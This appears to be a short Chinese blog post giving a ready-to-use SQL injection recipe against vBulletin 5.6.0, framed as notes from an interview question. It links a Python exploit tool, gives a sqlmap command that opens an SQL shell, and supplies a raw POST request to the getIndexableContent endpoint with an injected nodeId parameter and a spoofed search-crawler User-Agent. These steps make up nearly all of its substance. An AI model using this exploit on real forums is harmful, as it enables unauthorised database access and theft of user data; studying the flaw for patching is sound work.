vBulletin 5.6.0 SQL injection tool

记一次面试题目

vBulletin 5.6.0 SQL injection tool

IP：NONE
CMS：vBulletin 5.6.0
Attack mode：SQL injection

漏洞相关

工具

Python工具

https://gitee.com/zygds/vBulletin-5.6.0-SQL-injection-tool

Sqlmap：

sqlmap -r 1.txt --sql-shell # 命令可换其他

1.txt

POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: # 此处填写ip:post,80,443,不需要填写，记得删除这些文字
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

nodeId[nodeid]=1--

posted @ 2020-11-02 20:29 佛系云阅读(291) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

博客园

XRSec

低调求发展，潜心习安全

vBulletin 5.6.0 SQL injection tool

vBulletin 5.6.0 SQL injection tool

记一次面试题目

漏洞相关

工具

Python工具

Sqlmap：

公告